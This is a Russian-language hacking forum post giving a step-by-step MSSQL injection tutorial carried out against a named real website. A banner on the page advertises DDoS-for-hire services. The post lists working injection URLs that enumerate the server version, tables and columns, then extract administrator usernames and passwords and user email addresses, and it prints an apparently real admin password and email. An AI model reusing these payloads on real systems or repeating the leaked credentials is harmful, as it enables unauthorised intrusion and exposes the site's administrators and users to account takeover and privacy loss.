Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


MSSQL инъекция


  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1
aka PSIH

aka PSIH

    ~~~

  • Extended
  • PipPip
  • 238 сообщений
Знаю что в инете полно статей, но пусть у нас будет своя :)

Добрый день :)

Почему то многие люди думают что провести sql инъекцию в сервере от M$ довольно сложно
Однако это не так :)

Сейчас я вам покажу как легко проводить Mssql инъекции на примере ]]>www.fantasysportsunlimited.com]]>
Уязвимый параметр: http://www.fantasysp...cklink.asp?ID=1'

Для начала смотрим версию sql сервера:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=@@version--

Цитата

'Microsoft SQL Server 7.00 - 7.00.961 (Intel X86) Oct 24 2000 18:39:12 Copyright © 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) '
Теперь смотрим имя юзера:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(select system_user)--
user:  fsu

Далее начинаем перебирать имена таблиц:

http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--
имя первой таблицы - tbl_customers_midbasebally2k2

Узнаем имя второй:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('tbl_customers_midbasebally2k2'))--
имя второй -REFERENTIAL_CONSTRAINTS

Начинаем перебирать:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('tbl_customers_midbasebally2k2' ,'REFERENTIAL_CONSTRAINTS'))--
имя третей - tbl_customers_boardking

Имя четвертой узнаем так:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('tbl_customers_midbasebally2k2' ,'REFERENTIAL_CONSTRAINTS',  ' tbl_customers_boardking'))--

Так перебираем таблицы до конца, пока не выскачет ошибка
У нас ]]>получилось довольно много таблиц]]>, среди которых есть tbl_admin , она то нам больше всего и интересно :)

Теперь будем добывать данные из таблицы tbl_admin, для начала узнаем имена колонок:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_admin')--
имя первой колонки  ID

Узнаем имя второй колонки в таблице tbl_admin:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_admin' and COLUMN_NAME NOT IN ('ID'))--
имя второй колонки username

Перебираем дальше и узнаем имя третей колонки:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_admin' and COLUMN_NAME NOT IN ('ID',  'username'))--
имя третей  password

Вот так мы узнали все нужные нам колонки, для того чтобы попасть в админку
]]>http://www.fantasysp...ited.com/admin/]]>


Теперь нам необходимо вытащить данные из этих колонок:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 username FROM tbl_admin where ID=1)--
uname -jamiev

http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 username FROM tbl_admin where ID=1)--
password - fsu.com2jv

Username и Password второго админа:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 username  FROM tbl_admin where ID=2)--
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 password FROM tbl_admin where ID=2)--
Т.Е таким образом переберая ID= мы переходим по полям в базе, 1,2,3 и т.д

Таким образом можно сдампить все данные

Например достаем мыла из таблицы email (в базе есть таблица email, в ней есть колонки ID и email), перебераем мыла
Мыло первого юзера:
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 email FROM email where ID=1)--
jamie@fantasysportsunlimited.com

Это мыло 2 юзера
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 email FROM email where ID=2)--

А это 5
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 email FROM email where ID=5)--

Ну а это мыло 200 000  пользователя
http://www.fantasysportsunlimited.com/adinfo/fsuclicktracklink.asp?ID=(SELECT TOP 1 email FROM email where ID=200000)--

Ну вот собственно и все:)
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных